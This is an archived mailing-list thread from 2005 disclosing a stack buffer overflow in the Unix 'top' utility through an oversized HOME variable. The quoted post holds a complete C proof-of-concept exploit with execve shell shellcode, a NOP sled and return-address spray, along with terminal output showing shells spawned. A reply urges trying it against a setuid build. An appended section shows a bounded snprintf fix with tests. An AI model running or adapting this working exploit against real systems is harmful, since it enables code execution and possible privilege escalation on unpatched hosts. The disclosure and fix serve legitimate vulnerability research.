Sheesh, what is it with top and folks not fixing OLD arse bugs? =]
You may wanna check with William LeFebvre and make sure this issue is
fixed in his latest code base.
Sun freeware ships top as setuid... you may wanna try to exploit this
bug there. It *may* not be fixed.
Look familiar?
http://www.securiteam.com/exploits/5JP0A2A2BW.html
-KF
WINNY THOMAS wrote:
>While running top on a tool of mine to do a profiling
>test, the top command ran into a segmentation fault. I
>could find two instances where the command could
>misbehave:
>
>1. if you have junk data inside a
>file .toprc in your home directory
>2. if your environmental variable
>HOME is set to a string that’s greater than 1024.
>
>I managed to spawn a shell out of the top command by
>exploiting the second issue. If you compile and run
>the exploit code which I am including in the mail body
>you will get a shell. In case you don't, you can pass a
>parameter to the program as follows to adjust the
>offset.
>The vulnerability details are included in the code
>comments.
>
>[winnythomas_at_r8 WinnyThomas]$ ./putshellcode 1001
>sh-2.05b$ exit
>exit
>[winnythomas_at_r8 WinnyThomas]$ ./putshellcode 120
>Illegal instruction
>[winnythomas_at_r8 WinnyThomas]$ ./putshellcode 1010
>sh-2.05b$ exit
>exit
>
>In most of the tests I did on the vulnerable code I got a
>shell on my system without passing any parameter to
>the program (that is, the hardcoded offset of 1111 in
>my program worked well on my system).
>
>/*
> * Program: Proof of concept code for top exploit
> * Author: Winny Thomas, Nevis networks pune
> * Vulnerability: in top.c the function get_options uses strcpy to copy
> * the value of the environment variable HOME into a static buffer that
> * is allocated on the stack. Hence it's possible to apply a standard
> * stack smashing attack to overwrite the return address on the stack
> * and execute code of the attacker's choice.
> * NOTE: top is not setuid and hence the exploit won't spawn a root shell.
> * Tested on Red Hat 8 with procps version 2.0.7-25. The problem has
> * been fixed in the latest versions.
> *
> * This code is for educational purpose only and the
> * author shall not bear any responsibility for any
> * damage caused by using this code
> */
>
>#include <stdio.h>
>#include <stdlib.h>
>#include <string.h>   /* strlen, strcat */
>#include <unistd.h>   /* execl */
>
>/* execve("/bin/sh") shellcode for 32-bit Linux (i386) */
>char shellcode[] =
>"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
>
>/* payload that goes into HOME: NOP sled, shellcode, then repeated
> * return addresses; one extra byte keeps it NUL-terminated for strcat */
>char exploit_variable[1200 + 1];
>
>/* returns the current stack pointer: on i386 integer results come back
> * in %eax, so the value left there is what the caller sees (build with
> * -m32 and no optimisation, as the original was) */
>long get_esp(void)
>{
>    __asm__("movl %esp, %eax");
>}
>
>int main(int argc, char *argv[])
>{
>    long stackp, retaddr;
>    char SETENV[1250];
>    long *ptr;
>    int i, j, offset = 1111;
>
>    /* an optional first argument overrides the hardcoded offset */
>    if (argc > 1)
>        offset = atoi(argv[1]);
>
>    stackp = get_esp();
>    retaddr = stackp - offset;   /* guessed address inside the NOP sled */
>
>    /* fill the whole payload with the return address ... */
>    ptr = (long *)exploit_variable;
>    for (i = 0; i < 1200; i += 4)
>        *ptr++ = retaddr;
>
>    /* ... overwrite the first 600 bytes with NOPs ... */
>    for (i = 0; i < 600; i++)
>        exploit_variable[i] = '\x90';
>
>    /* ... and append the shellcode; the return addresses that remain
>     * after it are what lands past top's 1024-byte buffer */
>    for (j = 0; j < strlen(shellcode); j++, i++)
>        exploit_variable[i] = shellcode[j];
>    exploit_variable[1200] = '\0';
>
>    /* export the payload as HOME and run top */
>    sprintf(SETENV, "HOME=");
>    strcat(SETENV, exploit_variable);
>    putenv(SETENV);
>    execl("/usr/bin/top", "top", (char *)0);
>    perror("execl");   /* only reached if top could not be started */
>    return 1;
>}
Received on May 10 2005
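The bug class in the quoted post is an unbounded strcpy of an attacker-controlled environment variable into a fixed 1024-byte stack buffer. The following is an added example, not code from the post or from procps/top, showing that pattern next to a bounded replacement. The function names (build_rc_path_unsafe, build_rc_path, try_home_of_length), the "/.toprc" suffix handling and the absolute-path requirement are this example's own assumptions; the page does not say how procps actually fixed get_options.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Size of the fixed buffer the post describes: HOME longer than 1024
 * bytes crashes the vulnerable top. */
#define RC_PATH_BUF 1024

/*
 * Vulnerable shape, kept only for contrast: an unbounded copy of an
 * attacker-controlled environment variable into a fixed-size buffer.
 * Never call this with untrusted input; strlen(home) >= RC_PATH_BUF
 * writes past the end of 'out' and reaches the saved return address.
 */
void build_rc_path_unsafe(char out[RC_PATH_BUF], const char *home)
{
    strcpy(out, home);
    strcat(out, "/.toprc");
}

/*
 * Hardened version (hypothetical replacement, not procps' actual fix):
 * bounded formatting plus explicit rejection of missing or oversized
 * input. Returns 0 and fills 'out' on success; returns -1 and leaves
 * 'out' as an empty string if HOME is unset, not absolute, or does not
 * fit together with the "/.toprc" suffix and the terminating NUL.
 */
int build_rc_path(char *out, size_t outsz, const char *home)
{
    if (outsz == 0)
        return -1;
    out[0] = '\0';

    if (home == NULL || home[0] != '/')
        return -1;

    /* snprintf never writes more than outsz bytes and returns the length
     * the full string would have needed; needed >= outsz means truncation,
     * which is treated as an error rather than silently used. */
    int needed = snprintf(out, outsz, "%s/.toprc", home);
    if (needed < 0 || (size_t)needed >= outsz) {
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Constructed test input: an absolute path made of '/' followed by
 * (len - 1) 'A' characters, i.e. exactly len bytes long. Returns the
 * result of build_rc_path on it with the 1024-byte buffer size. */
int try_home_of_length(size_t len)
{
    char out[RC_PATH_BUF];
    char *home;
    int rc;

    if (len == 0 || (home = malloc(len + 1)) == NULL)
        return -1;
    home[0] = '/';
    memset(home + 1, 'A', len - 1);
    home[len] = '\0';

    rc = build_rc_path(out, sizeof out, home);
    free(home);
    return rc;
}

int main(void)
{
    char out[RC_PATH_BUF];

    if (build_rc_path(out, sizeof out, "/home/winny") == 0)
        printf("ok:   %s\n", out);

    /* 1016 is the longest HOME that still fits with "/.toprc" and the NUL;
     * anything longer would have overflowed the strcpy version. */
    printf("1016-byte HOME: %s\n", try_home_of_length(1016) == 0 ? "accepted" : "rejected");
    printf("1017-byte HOME: %s\n", try_home_of_length(1017) == 0 ? "accepted" : "rejected");
    printf("1200-byte HOME: %s\n", try_home_of_length(1200) == 0 ? "accepted" : "rejected");

    /* What the real program should do: read HOME and fall back to
     * built-in defaults when the value is rejected. */
    if (build_rc_path(out, sizeof out, getenv("HOME")) != 0)
        printf("HOME rejected; running with built-in defaults\n");
    return 0;
}
```

The point of the bounded version is that the length check happens before any byte is written past the buffer, and that an oversized HOME is an error the program handles (ignore the rc file) rather than input it trusts. A 1200-byte payload like the one in the post is simply refused.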